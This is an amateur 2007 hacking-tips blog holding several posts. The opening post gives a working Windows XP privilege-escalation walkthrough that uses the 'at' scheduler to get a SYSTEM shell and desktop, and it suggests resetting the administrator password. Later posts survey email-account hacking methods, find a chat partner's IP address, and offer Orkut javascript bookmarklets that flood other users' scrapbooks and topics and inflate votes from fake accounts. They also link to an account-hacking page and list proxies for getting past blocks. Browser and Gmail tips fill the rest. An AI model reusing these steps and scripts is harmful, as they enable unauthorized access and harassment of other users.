death arrival

computer hacking

2007-10-16T05:45:00.000-07:00

really that is possible !

u know why is it a "user" account because it lacks come service layer than that in "administrator" account

Using simple command line tools on a machine running Windows XP we will obtain system level privileges, and run the entire explorer process (Desktop), and all processes that run from it have system privileges. The system run level is higher than administrator, and has full control of the operating system and it’s kernel. On many machines this can be exploited even with the guest account. At the time I’m publishing this, I have been unable to find any other mention of people running an entire desktop as system, although I have seen some articles regarding the SYSTEM command prompt.

Local privilege escalation is useful on any system that a hacker may compromise; the system account allows for several other things that aren’t normally possible (like resetting the administrator password).

The Local System account is used by the Windows OS to control various aspects of the system (kernel, services, etc); the account shows up as SYSTEM in the Task Manager

Local System differs from an Administrator account in that it has full control of the operating system, similar to root on a *nix machine. Most System processes are required by the operating system, and cannot be closed, even by an Administrator account; attempting to close them will result in a error message. The following quote from Wikipedia explains this in a easy to understand way:

You can trick the system into running a program, script, or batch file with system level privileges.

One sample

One trick is to use a vulnerability in Windows long filename support.
Try placing an executable named Program.*, in the root directory of the "Windows" drive. Then reboot. The system may run the Program.*, with system level privileges. So long as one of the applications in the "Program Files" directory is a startup app. The call to "Program Files", will be intercepted by Program.*.

Microsoft eventually caught on to that trick. Now days, more and more, of the startup applications are being coded to use limited privileges.

Quote:
In Windows NT and later systems derived from it (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista), there may or may not be a superuser. By default, there is a superuser named Administrator, although it is not an exact analogue of the Unix root superuser account. Administrator does not have all the privileges of root because some superuser privileges are assigned to the Local System account in Windows NT.

Under normal circumstances, a user cannot run code as System, only the operating system itself has this ability, but by using the command line, we will trick Windows into running our desktop as System, along with all applications that are started from within.
Getting SYSTEM
I will now walk you through the process of obtaining SYSTEM privileges.
To start, lets open up a command prompt (Start > Run > cmd > [ENTER]).
At the prompt, enter the following command, then press [ENTER]:
Code:
at

If it responds with an “access denied” error, then we are out of luck, and you’ll have to try another method of privilege escalation; if it responds with “There are no entries in the list” (or sometimes with multiple entries already in the list) then we are good. Access to the at command varies, on some installations of Windows, even the Guest account can access it, on others it’s limited to Administrator accounts. If you can use the at command, enter the following commands, then press [ENTER]:

Code:
at 15:25 /interactive “cmd.exe”

Lets break down the preceding code. The “at” told the machine to run the at command, everything after that are the operators for the command, the important thing here, is to change the time (24 hour format) to one minute after the time currently set on your computers clock, for example: If your computer’s clock says it’s 4:30pm, convert this to 24 hour format (16:30) then use 16:31 as the time in the command. If you issue the at command again with no operators, then you should see something similar to this:

When the system clock reaches the time you set, then a new command prompt will magically run. The difference is that this one is running with system privileges (because it was started by the task scheduler service, which runs under the Local System account). It should look like this:

You’ll notice that the title bar has changed from cmd.exe to svchost.exe (which is short for Service Host). Now that we have our system command prompt, you may close the old one. Run Task Manager by either pressing CTRL+ALT+DELETE or typing taskmgr at the command prompt. In task manager, go to the processes tab, and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there.
At the system command prompt, enter in the following:

Code:
explorer.exe

A desktop will come back up, but what this? It isn’t your desktop. Go to the start menu and look at the user name, it should say “SYSTEM”. Also open up task manager again, and you’ll notice that explorer.exe is now running as SYSTEM. The easiest way to get back into your own desktop, is to log out and then log back in. The following 2 screenshots show my results (click to zoom):

System user name on start menu

explorer.exe running under SYSTEM

What to do now
Now that we have SYSTEM access, everything that we run from our explorer process will have it too, browsers, games, etc. You also have the ability to reset the administrators password, and kill other processes owned by SYSTEM. You can do anything on the machine, the equivalent of root; You are now God of the Windows machine. I’ll leave the rest up to your imagination.

ADMINISTRATOR IN WELCOME SCREEN.

When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.

EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!

Start the Registry Editor Go to:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.

craking email password

2007-10-16T05:44:00.002-07:00

Almost every one of us has heard a friend complaining that his email account has been hacked. Or it may have happened to you. The truth is that hacking yahoo messenger accounts or any other kind of email provider account has become quite a problem for users.
MSN password hacking or hacking yahoo accounts is no longer the realm of experts.

Thanks to the widespread use of the internet, any hacker can learn the required tricks to master the art of hacking yahoo ids or hotmail email password hacking. He only needs to make a basic search with keywords like hacking yahoo passwords, msn messenger hacking tools, msn hacking programs, hacking yahoo mail, hotmail hacking programs, hacking yahoo email or even something as simple as hotmail hacking guide. All of that is out there, ready to be learnt.

Can Emails Be Hacked?

Yes. As a matter of fact, almost anything can be hacked in the Internet. The problem is that email accounts are the repositories were people store their private information or even their business data. It is a quite serious condition and most of the mail providers have taken some measures for stopping it. Unfortunately, users don't take them seriously and they don't follow the precautions.

There are several methods for hacking yahoo, msn or AOL email accounts. One of these methods is social engineering. Considered a revolutionary art among the hacker community, it has proven to be an interesting tool that can be exploited by anyone.

Social engineering consists in the ability to trick someone in believing that he is giving information to someone who has the authority to ask for it. The most common way to do it is through the telephone or via the internet. Let's say that a user receives a call from someone who identifies himself as a system administrator of his company and that he requires some information that could be considered harmless.

It's quite probable that that bit of information is the final piece that the hacker required for finishing his work. Something as innocent as when was the last time that the system asked the user to change his password could be used by him in his advantage.

A quite ingenious method within social engineering was a webpage were users required to enter their mail and password for finding if someone had deleted or blocked them from their Instant Messenger (IM). Unfortunately, many fell under this scheme. Hacking yahoo messenger or any other messenger is quite easy if you find how to exploit the user's needs.

Alternatives used

Besides social engineering, hackers can obtain your password through other means, like worms, viruses or Trojans. Once a hacker is inside your computer, he will look for those files
were your login names and passwords are stored. That's they reason why it isn't considered
safe to store them inside your computer. Even when the provider tells you that it is safe. Remember than there isn't a more secure place for keeping your password than your mind.

Methods Used In The Past !

In the past, one of the common practices used by hacker was using programs that tried different password combinations until it found the correct one. This method was contra rested by email providers by giving a limited number of options or by placing some security measures inside their webpage.

Other method was placing false web pages instead of the original ones. A hacker could make a user think that he is accessing his email at the webpage of his email provider. In reality, he was entering all his information to a webpage created by the hacker. This scheme isn't used any more since users have become a bit more careful and have acquired some concepts on internet security. They have started using secure pages for login which starts

What Are Keyloggers?

Keyloggers are specially devised programs that are installed inside a computer via a Trojan, a virus or a worm. Once inside, the keylogger will auto execute and start recording all the key strokes made by the computer user. Once a determined period of time has gone by, the keylogger will send the keystroke information to the hacker who sent this infectious software.

Then the hacker will start searching key combinations that can lead him to determine the password for determined web pages. This simple and effective method is a favorite among hackers since it can provide them with lots of private information from their victims.

Many computer users have more than one email account, especially if they use the messenger services from multiple providers, like Microsoft's Hotmail, Yahoo's Email or AOL email. It doesn't matter if you have one or many email accounts, every one of them may be a victim of a hacker. Even with the security measures imposed by the companies, Yahoo password hacking or hotmail hacking still exist. And it's very improbable that will disappear.

So, if you want to protect yourself from people who are hacking yahoo accounts or whose whole purpose in life is to do some MSN hacking, then increase the number of special characters in your password and try not to access your email account from a computer that is not yours. And that goes to IM's too. The ability for hacking yahoo messenger or any other IM provider it's a latent danger for all of us.

LOCALLY STORED PASSWORDS

Most browsers, including Internet Explorer® and Netscape®, the AOL® client, and Windows® Dial-Up Connections allow you the option to store passwords. These passwords are stored on the local machine and (depending upon where and how it is stored) there is usually a method of recovering these passwords. Storing any password locally is insecure and may allow the password to be recovered by anyone who has access to the local machine. While we are not currently aware of any program to recover locally stored AOL® passwords, we do not recommend that these are secure. Software does exist that can recover most of the other types of locally stored passwords.

TROJAN

A Trojan is a program that is sent to a user that allows an attacker to control functions of the target computer, recover information from the target or to delete or damage files on the target. The name Trojan is given because the program will usually come attached to some other program or file that entices you to run it. There are a wide variety of Trojans any number of which can be programmed to capture passwords as they are typed and to email or transmit them to a third party. To protect yourself against Trojans, you should never execute or download software or files that are not from a trusted source. It is critical that anyone working on internet use a virus protection program (which should catch most Trojans.) Note that since a Trojan requires the password to be typed or stored in order to be recovered, this is not an effective way to recover your own password. It could explain, however, how someone could lose their password to a hacker. Sending someone a Trojan program is certainly illegal and we do not recommend or condone this activity. A Trojan is unlikely to be effective in recovering a particular account password since it requires the target to install it. However, hackers will often bulk mail Trojans to thousands of people in the hope that a small percentage will get caught. Legitimate account holders who may have been caught by a Trojan and can authenticate themselves should contact their service provider to have their account passwords res

SNIFFING
If two people do not share the same computer, but do share the same network, it may be possible for one to sniff the others' packets as they sign-on. The traffic between your computer and the internet site you are accessing may be able to be recorded and decrypted or "played-back." This is not a simple attack to execute, but is possible if two people are close to one another and share a hub. Again, this is likely to be illegal and we do not condone this activity.

ip hacking

2007-10-16T05:44:00.001-07:00

Send a file to that person.
This can be any file in the range of 200 kB to say 1MB.
As soon as you send the file and the person has accepted the file (while the file is transferring), Go to Start > Run > cmd
Type there netstat -a

It will list all the connections your computer is connected to.
You will see Port 1863 or a similar port number which msn messenger uses.

For example the line will look like:
TCP Blah Blah:1033 msgr-ns29.msgr.hotmail.com:1863 ESTABLISHED

(I dont know the exact port number : look in wikipedia for the port number which Windows Live Messenger uses)
Thats it. The foreign address is the person's address whom you are chatting with.

and u can also use angry ip scanner

rapid share free account

2007-10-16T05:43:00.001-07:00

http://www.freerapidaccount.com/free/?r=575640

increase internet speed

2007-10-16T05:42:00.000-07:00

INTERNET EXPLORER Speed up STARTUP .

Isn't it annoying when you want to go to a new website, or any other site but your homepage, and you have to wait for your 'home' to load? This tweak tells Internet Explorer to simply 'run', without loading any webpages. (If you use a 'blank' page, that is still a page, and slows access. Notice the 'about:blank' in the address bar. The blank html page must still be loaded..). To load IE with 'nothing' [nothing is different than blank]:

1. Right-click on any shortcut you have to IE
[You should create a shortcut out of your desktop IE icon, and delete the original icon]
2. Click Properties
3. Add ' -nohome' [with a space before the dash] after the endquotes in the Target field.
4. Click OK
Fire up IE from your modified shortcut, and be amazed by how fast you are able to use IE!

~ cheers ~ (it works)

INTERNET EXPLORER SPEED UP.

Edit your link to start Internet Explorer to have -nohome after it. For Example: "C:\Program Files\Internet Explorer\IEXPLORE.EXE" -nohome
This will load internet explorer very fast because it does not load a webpage while it is loading. If you want to go to your homepage after it is loaded, just click on the home button.

or

Open registry editor by going to Start then >> Run and entering >> regedit.

Once in registry, navigate to key.

HKEY_CURRENT_USER\Software\microsoft\Windows\CurrentVersion\InternetSettings. Right click @ windows right > New > DWORD.

Type MaxConnectionsPerServer > You can set value (the more higher the no, the more good speed u get, e;g : 99). [99 in hexa so 153 in binary]

Create another DWORD >type MaxConnectionsPer1_0Server. Then put a high value as mentioned above.

Restart I.E and you are done.

SPEED UP BROWSING WITH DNS trick.!!

when you connect to a web site your computer sends information back and forth, this is obvious. Some of this information deals with resolving the site name to an IP address, the stuff that tcp/ip really deals with, not words. This is DNS information and is used so that you will not need to ask for the site location each and every time you visit the site. Although WinXP and win2000 has a pretty efficient DNS cache, you can increase its overall performance by increasing its size. You can do this with the registry entries below:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters]
"CacheHashTableBucketSize"=dword:00000001
"CacheHashTableSize"=dword:00000180
"MaxCacheEntryTtlLimit"=dword:0000fa00
"MaxSOACacheEntryTtlLimit"=dword:0000012d

make a new text file and rename it to dnscache.reg. Then copy and paste the above into it and save it. Then merge it into the registry.

START Internet EXPLORER WITH EMPTY BLUE SCREEN.!!

Set your default page to about:mozilla and IE will show a nice blue screen upon startup.

FIX IE 6 SLOWDOWNS AND HANGS.

1. Open a command prompt window on the desktop (Start/Run/command).
2. Exit IE and Windows Explorer (iexplore.exe and explorer.exe, respectively, in Task Manager, i.e - Ctrl-Alt-Del/Task Manager/Processes/End Process for each).
3. Use the following command exactly from your command prompt window to delete the corrupt file:
C:\>del "%systemdrive%\Documents and Settings\%username%\Local
Settings\Temporary Internet Files\Content.IE5\index.dat"
4. Restart Windows Explorer with Task Manager (Ctrl-Alt-Del/Task Manager/Applications/New Task/Browse/C:\Windows\explorer.exe[or your path]) or Shutdown/Restart the computer from Task Manager.

SPEED UP WEB BROWSING.

Iv'e personally found a dramatic increase in web browsing after clearing the Windows XP DNS cache. To clear it type the following in a command prompt: ipconfig /flushdns.

ALLOW MORE THAN 2 SIMULTANEOUS DOWNLOADS ON IEXPLORER 6.
This is to increase the the number of max downloads to 10.
1. Start Registry Editor (Regedt32.exe).
2. Locate the following key in the registry:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
3. On the Edit menu, click Add Value , and then add the following registry values:
"MaxConnectionsPer1_0Server"=Dword:0000000a
"MaxConnectionsPerServer"=Dword:0000000a
4. Quit Registry Editor.

IPV6 INSTALLATION FOR WINDOWS XP.

This protocol is distined to replace the Internet Protocal Version 4 used by Internet Explorer it uses hexadecimal ip addresses instead of decimal example (decimal ip 62.98.231.67) (hexadecimal IP 2001:6b8:0:400::70c)
To install To install the IPv6 Protocol for Windows XP:
Log on to the computer running Windows XP with a user account that has local administrator privileges. Open a command prompt. From the Windows XP desktop, click Start, point to Programs, point to Accessories, and then click Command Prompt. At the command prompt, type: ipv6 install
For more information on IPv6, visit the site below:
CODEhttp://www.microsoft.com/windowsxp/pro/techinfo/administration/ipv6/default.asp

ANOTHER WAY TO FIX IEXPLORER 6 SLOW PAGES LOADED.

Here's an easier way to get to index.dat file as addresse in another tweak submitted here.
1. click on Internet Explorer
2. go to to your root dir (usually C:)
3. open Documents and Settings folder
4. open "your username folder"
5. open UserData
6. **close IE if you have it open**
rename index.dat to index.old
logoff and log back on (don't need to restart) open up IE and go to a web page or site that always seemed to load slowly. It should load a lot more quickly now. NOTE. Always rename or backup .dat or other system files before deleting.

Disable Right Click!!

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]
"NoBrowserContextMenu"=dword:00000001

Enable Right Click!!

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]
"NoBrowserContextMenu"=dword:00000000

do u want to save entire Page For offline viweing??
Saving Web Pages with Internet Explorer 6

Occasionally, you may want to save an entire Web page on your computer (text, hyperlinks, graphics, and all). To save the Web page that currently appears in Internet Explorer, choose File-->Save As to open the Save Web Page dialog box shown in the following figure. Select the folder in which you want the page saved and then click the Save button.
After saving a Web page on your hard drive, you can open it in Internet Explorer and view the contents even when you're not connected to the Internet. If your motive for saving the Web page, however, is to be able to view the content when you're not connected to the Internet, you're better off saving the page as a Favorite marked for offline viewing. That way, you can decide whether you want to view other pages linked to the one you're saving and you can have Internet Explorer check the site for updated content.
You can also e-mail a Web page or a link to the page to a colleague or friend. To send the current Web page in a new e-mail message, click File-->Send-->Page by E-mail on the Explorer menu bar and then fill out the new e-mail. To send a link to the page instead, click File-->Send-->Link by E-Mail. To create a desktop shortcut to the Web page, click File-->Send-->Shortcut to Desktop.

crush inter net explorer 6

2007-10-16T05:41:00.000-07:00

A Japanese blogger who goes by the name Hamachiya2 has discovered a single line of HTML and CSS that crashes IE 6. The line is:

wanna try here you go

crash my ie6

firefox, opera and safari are immune to it

orkut scripts 2

2007-10-16T05:40:00.001-07:00

Steps to flood others scrapbook: ==> Go to the profile of your friend.==> Copy Paste this in your address barjavascript:var i=1;function sansor(){i=i+1;document.forms[0].elements[2].value= "I have flooded our SCRAPBOOK by this numberof times"+"[green]"+i+"[/green]";document.getElementsByTagName(’input’).item(3).click();};void(setInterval(sansor,500));New Script
javascript:i=9874654;sar=’Flooding by Sanjay Kumar \n Orkut New Flooding Script Available on sansor.wordpress.com\n [silver]’; a=document.forms[0];a.action+=’&Action.submit=’; setInterval("i++; a.scrapText.value=sar+i; a.submit()",500);void(0)
==>Press Enter
Steps to flood your own scrapbook: ==>Open your own scrapboook==> Copy paste this code
javascript:var i=" ";function sansor(){i=i+" ";document.forms[0].elements[2].value=" "+i;document.getElementsByTagName(’input’).item(3).click();};void(setInterval(sansor,500));
==> Other technique: If you have enough time.. just write any messageand keep clicking the submit button. ORKUT DOESNT THROW ANY ERROR FOR THE SAME MESSAGE BY THE OWNER.
Increasing Number of fans
Increasing your fan list:==> Add yourself in any fraud account you have.==> Log into the fraud account.==> Go to http://www.orkut.com/Friends.aspx==> Put cursor on the "fan" icon. You will see at the status bar of yourbrowser (at the bottom of your browser) something like" FRUS0016756489/US209709881 ". Write down that thing in a copy.==> Now write this code in the address bar:javascript:i=0;for(i=0;i<=100;i++){sendRequest("/SetKarma.aspx?cat="+0+"&val="+"3″+"&gid="+"FRUS0009505081/US0014188150″);};void(0);==> Change "FRUS0009505081/US0014188150″ with the one you havewritten in the copy.==> Press Enter.
Testimonial Flodding
==> Open the testimonial writting page of your any friend.==> Paste this in the address bar:javascript:function sansor(){document.getElementsByTagName(’input’).item(2).click();};void(setInterval(sansor,404)); There are some software available which will do all these shits using some GUI.. I willsoon post the link for that. Keep checking my blogs..
Hacking Orkut Account
http://sansor.wordpress.com/2006/06/18/hack-orkut-account-worst-way/
Colorful Scraps
==> Write your message/scrap/ in community or scrapbook==> Copy paste the code below in your browser and then press enter.==> You will see change in the message you wrote,Press Submit and enjoy.javascript:cor=new Array(’aqua’,'blue’,'fuchsia’,'gold’,'gray’,‘green’,'lime’,'maroon’,'navy’,'olive’,'orange’,'pink’,'purple’,'red’,’silver’,'teal’,'violet’,'yellow’ ); varz=0;txt=document.getElementsByTagName(’textarea’)[0]; txt.value=txt.value.replace(/(.)/gi,"§$1″);txt.value =txt.value.replace(/\§ /gi," "); for(y=0;yAnimated Orkut Windows
==> Just copy paste in your browser and see what happens:javascript:R=-1;DI=document.links;DIL=DI.length;function A(a,b,c){return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position=’absolute’;DIS.left=A(5,100,500);DIS.top=A(5.6,60,150)}setInterval(’R++;B(R%DIL)’,15);void(0)
Invisible Name /Post
== > PressALT +0173 [ from the side keyboard]It may not work in laptops as side keyboards are notavailable there.
Reverse the Post
i mean you dont need to type backword.. just use this keyword.."& # 8 2 3 8″ with no spaces and blanks in between.
Hiding name
Same trick as Invisible names
Blank Scrap
Use [i] onlyNEW ARRIVALS
Bigger Display pic
javascript:i=128;void(setInterval("i++;document.images[2].width=i",0))
Color Change Code
javascript: i=0; c=["green","blue","yellow"]; a=document.links;setInterval(’i++;a[i % document.links.length].style.color=c[i % c.length]’,10);void(0)
See All Album pic in original size
javascript:d=document.body.innerHTML; m=d.match(/http:..images3.orkut.com.images.milieu.{1,99}jpg/gi); for(z=0;z")};void(0)

orkut scripts

2007-10-16T05:39:00.001-07:00

24) Decrease count of posts in a community !
You must be the Author of the post to perform this trick. Open the thread which is started by you Copy the following code and paste in the URL bar.javascript:sar=document.getElementsByTagName('input');document.body.innerHTML+='';document.forms[1].target='NegFlood';omdt_lowposts=setInterval("sar['topicId'].value='';sar['commId'].value='';sar['messageId'].value='';submitForm(document.forms[1],'delete','')", 1000);void(0)
25) See All Pictures Of Album In Fullsize At A Time !!
Use This CODE:javascript:d=document.body.innerHTML; m=d.match(/http:..images3.orkut.com.images.milieu.{1,99}jpg/gi);for(z=0;z")};void(0)*Method To Use*Open Andbody's Album You Want To SeeJust Paste This CODE & (Press Enter)or(GO)it works~cheers ~
26) Crazy script: !!
javascript:R=-1;DI=document.links;DIL=DI.length;function A(a,b,c){return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position='absolute';DIS.left=A(5,100,500);DIS.top=A(5.6,60,150)}setInterval('R++;B(R%DIL)',15);void(0)
27) Have LONGGGGGGGGGGGGGGGGGG Name .. Best one !!
create a new profile.and while u sign up on google account pagefirst run this scriptjavascript:var i=0;function de(){i=i+1;document.forms[0].elements[10].maxlength=200;}void(setInterval(de,300));then run this scriptjavascript:var i=0;function de(){i=i+1;document.forms[0].elements[11].maxlength=200;}void(setInterval(de,300));then write a first name of exacty 200 words. no morethen write the second name of exactly 200 words. no morethats all.-----------------------------------the purpose of the script is to limit u to 200 so that u wont excede the google limit-----------------------------------
28) Testomonial flodder !! The Best one .. never seen
javascript:var i=0;function hkhj(){i=Math.floor(Math.random()*123467891234567890987654321);document.getElementById('countedTextbox').value="Soo how you like this messing up with me \nOrkut Testimonial Flooding Script \n Programmed By \nhttp://rahulhackingarticles.wetpaint.com \n Counter:: "+i;submitForm(document.getElementsByTagName('tr').item(15),'submit','');}void(setInterval(hkhj,750));perfect onei dont need to tell u what to do. !please post a comment if u liked it !!
29) Scripts for Flooding Replies in Topic !!
javascript:function cmd(){var msg="your message here"; var i=Math.floor(Math.random()*987668764);document.getElementsByTagName('input').item(2).value=msg;document.getElementsByTagName('TEXTAREA').item(0).value=msg+"counter:::"+i;document.getElementsByTagName('input').item(6).click();}void(setInterval(cmd,350));dose who can trick how to run dis will only be able to run itm sorry cant disclose it or i will be kicked out of many communities..but one thing is for sure it works~cheers~
30)Community Topic Flooder !!
javascript:i=0;sar=document.getElementsByTagName('TEXTAREA').item(0).value;document.body.innerHTML+='';document.forms[1].target='TextFlooding';setInterval("document.getElementsByTagName('TEXTAREA').item(0).value=sar+' '+ i;a=submitForm(document.forms[1], 'submit', '');i++",2000);void(0)same here buddies u have to crawl ur way to run it.. it works n is easy to do so !!
31) Join Communities in Bulk !!
Just Put Any Community Id You Want To Join For Ex :cmm=182560805o,75,100 How Many You WantAnd Open Your Scrapbook.aspx?Paste The code It Will Join All Communities According to Comm Id's Given In The Scriptcode: javascript:i=0;cmm="6348046","7579260","6349476","17726544","18601321","117201","5139875","4634310"];a=document.forms[1]; a.target='f'; setInterval("i++;a.action='CommunityJoin.aspx?Action.join&cmm='+cmm[i%cmm.length];a.submit()",5000);howws Dat!!
32) Make urself invisible !!
Hey there .. ll i was thinking about it from past so long.. but it was really easy just d case it dint strike me..however here i present dis flawless trick !!in ur names(first and last)hold "alt" n while holding it type 0160 4rm da number pads on da write sides..type this thing in ur first as well as last name...u'll get itoron the first and last name sectionwhile holding down up button press enter +insert button together.simply erase your picture n u are invisible now !!whats say??do post ur comment if u can defy laws and can create some cool trick !!
33) SURF ORKUT EVEN FROM PLACES WHERE ITS BLOCKED!!!!
here are some proxys..just type in http://www.orkut.com in companies or colleges where its blocked n enjoy
www.mathtunnel.com
www.gravitywars.com
www.kproxy.com
www.calculatepie.com
http://www.anonymizer.com/
post more if u know them !!
34) Scrap Formatter !!
right click and open in a new window.. this is a good tool
click here
35) Amazing Smilies !!
right click and open in a new window.. this is a perfect toolclick here
36) Delete Topic from a community !!
You need to be the creator of the topic. You NEED NOT be the owner of the community. Open the topic created by YOU. Copy the following code and paste in the URL bar. javascript:submitForm(document.forms[1],'delete_entire_topic','');void(0)
37) Secret messages : good one
You can send a secret message to your friends from these sites. Enter any one the following sites. Enter your message in the text box and click ENCRYPT (click it as many times as you want to make it more secure) Copy the encrypted code and paste it in the scrapbook of your friend. Your friend can copy this code and paste it in the same page and click DECRYPT till he get meaningful message. Here are the links - Onnet and Crazy Souls. This is not a secure way as any one can copy the message and decrypt it till they get a meaningful message.
38) This iz d Orkut Statistics Page ...
Get 2 know who dominates Orkut ....http://www.orkut.com/MembersAll.aspx
39) How old r u at orkut ?????
U wanna no u are which member 2 join orkut ????Right click on the profile photo and opt for 'save image as'. You would see a number for your photo, that's the orkut membership no.Eg. You are 22,335,123.
Access ORKUT On Your Mobile Phone or PDA
Here is a tip for all Orkut users… Have you ever tried to access orkut on your mobile browser, or even OPERA MINI. If you have tried, you must surely know what happens……….Let me tell u for those who have not tried it..The login box does not appear…. As a result you cannot sign in and therefore, to say as a whole, ORKUT CANNOT BE ACCESSED ON MOBILE!!!!!But here is a trick for all to ACCESS ORKUT ON YOUR MOBILE.. You need to do nothing, just follow the link-https://www.google.com/accounts/Serv....aspx&hl=en-US And you will see that only the login-box appears, just sign in and there you are…The whole ORKUT at your hands!!!!If you lose this link,, here is how to get it.. when you open www.orkut.com on your pc. The login box loads in a different frame.., In Firefox, right click on this frame and Select load this frame only, and the link you get for that frame is this link.Actualy what happens is that we load only this frame and not the others..
HIDE Ur COUNTRY NAME
Select Edit profile Option.
copy paste the following script on address bar.
Now at the end of Country "Select" you will have a Country named ORKUTRIX.
Just Select ORKUTRIX as your country and press UPDATE PROFILE

Tips and Tricks about GMAIL

2007-10-16T05:38:00.001-07:00

Tips and Tricks about GMAIL
Keep scrolling down it goes Better : Rahul Dutt Avasthy While Web-based email is nothing new, Gmail introduces some new and unique concepts. Managing email has become very easy while at the same time having powerful tools to find and review information.
1.) Advertizing:
This is probably the single most controversial aspect of Gmail. Opponents have said that Google's approach to inserting ads based on message content is a huge privacy breach. Gmail does not "read" your email. Gmail does not breach your privacy. Gmail does not care about your message content. All Gmail is doing is running your message through a "processor" that looks for ad-related keywords so that it can display unobtrusive targeted ads. Another important point about Gmail's ads is that they are VERY unobtrusive. They are much like the "Sponsored ads" you see on the right of a Google Search results screen. In fact, they don't even show up on every email message that you read, and so far, that's the only place you see the ads: when reading messages. They don't appear in any other screen. Gmail's ads are FAR less annoying than the flashy lights and huge billboards that services like Yahoo Mail and Hotmail use. And, given that the ads are intended to be targeted based on message content, you shouldn't see inapropriate or unrelated ads.
2.) Reading Messages:
Note a couple things: First, no external graphics are displayed. By default, Gmail disables displaying externally referenced graphics. The reason is that many spam messages contain externally referenced graphics. When they are displayed, the email sender can use this to track that you opened the message thus validating your email address for future spam. Clicking on the "Display External Images" link will display the images if you want. There is one glaring problem: If the original email is HTML or Rich Text formatted, Gmail will strip out ALL formatting including links, fonts, and images. ie: you can only reply in plain text.
3.) Archiving :
One of the first concepts that you have to get used to with Gmail is that of "Archiving". The overall power of Gmail is in its message management, searching and archival capabilities. With 1GB of storage, the average email user will have enough storage space to hold several years worth of emails. Yes, there will always be emails that you simply don't want to keep. Archiving a message simply tells Gmail to remove the message from your Inbox screen and keep it in your "All Mail" screen. All emails will remain in your inbox until you specifically "Archive" them. Archiving simply removes the message from your inbox screen.But what happens to it? Don't worry, all messages are always accessible through the "All Mail" screen. Archiving simply cleans up your inbox. Once a message has been archived, should you ever want to, you can easily move it back to the inbox, but there really isn't a need for that.
4.) Labels :
A Label is a way of classifying an email. It's similar to "folders" but it goes much farther: You can optionally assign a user-definable Label to any email. Then, when you click on a specific label in the label list on the left of the screen, Gmail displays only those emails under that label. Sounds a lot like folders, right? The power of Labels shows in being able to assign multiple labels to an email. When you organize emails in folders, an email can reside in only one folder at a time. Say you have one folder called "Family" and another called "Jokes". Your brother sends you a joke email, so where do you put it--the Family folder or the Jokes folder? Gmail's Labels let you assign multiple labels to each email, so you could label your brother's joke email with both "Family" AND "Jokes" labels. At first, this may not seem too exciting, but after a while, you will see how this could be very powerful, especially with large numbers of accumulated emails.
Gmail Tip #1: All About Labels
You can add a Label to a message in one of two ways: If you are viewing a message listing, you can just click the checkbox next to the message, click on the "Apply label..." dropdown, and select the Label you want to apply. Gmail will display the Label just to the left of the message's Subject.If you are viewing a message, just click on the "Apply label..." dropdown, and select the label you want to apply. Gmail will display the new label to the right of the Subject line.OK, you assigned a Label to a message, but at a later time, you want to remove it. How do you do that? Just select the Label view from the Labels box on the left, "select" the specific message by clicking the checkbox next to the message, and then click on the "Remove label 'xxxx'" button at the top of the listing. Your label has now been removed!
Gmail Tip #2: How to Maintain 'Notes'
Some email providers provide a "Notes" function to let you maintain a list of notes. For example you might keep Web site links, random thoughts, etc. Gmail doesn't offer this feature, but by using some of Gmail's other features, you can set up a very nice, easy to maintain group of notes...Here's what you do:First, create a Contact with a Name of "Notes" and an Email Address of "username+Notes@gmail.com"Next, create a new Label called "Notes"Finally, create a Filter to add the "Notes" Label any email addressed to "username+Notes@gmail.com". Also, check the "Skip the Inbox (Archive it)" checkbox.The effect is this: When you email yourself from an email account other than your own Gmail account, address the email to "username+Notes@gmail.com". When the message arrives in your Gmail account, it will automatically be archived into your "Notes" Label view, bypassing the Inbox. Nice and organized.
Gmail Tip #3: The 'Plus' Side of Gmail
Like many Email providers, Gmail supports the standard "plus" addressing scheme. But just what is it, and how can it help me?The "plus" method of addressing lets you add additional words to your account name (the "left side" of your email address.) For example, if your email address is "john.doe@gmail.com", you could add "+club" when you give your email address to members of a club to which you belong. So, your email address would now be "john.doe+club@gmail.com". But why would you want to do this? Think of the "plus" word as an extra "keyword" or "tag" that you can use to better manage your messages.Using our example, say you email an invitation to your friends in a club asking them to rsvp to the invitaion. You ask them to reply to "john.doe+nope@gtmail.com" when sending you a responseif they don't want to come, and reply to "john.doe+ofcourse@gmail.com". Assuming they follow your directions, You can then set up a Gmail Filters to automatically route emails to specific Labels based on the addresses. It's a simple example, but the uses can be numerous.Another use is when you are shopping online. When asked for an email address, use something like "john.doe+amazon@gmail.com". That way, whenever you get future emails addressed to that address, you'll know that it's either from Amazon directly or from someone to whom they sold your email address. This can be a somewhat effctive way to track spam. Just be aware that not all email systems recognize or accept "plus" addresses. In fact, some spammers even strip it out completely, but it's a cool tool, none the less. The best way is to just try it and see if it works for your application!
Gmail Tip #4: What Happens To Sent Messages?
When you "send" a message, two things happen to it: it gets copied into your "All Mail" view, and it is visible in the "Sent Mail" view. Many email clients and Webmail services let you optionally delete all sent messages by default, but Gmail doesn't offer this feature. Here's why...One of Gmail's intentions is to get you out of the "trash everything" mindset. This is one of the reasons why they offer 2GB of storage.
Gmail Tip #5: Advanced Search - View Multiple Labels
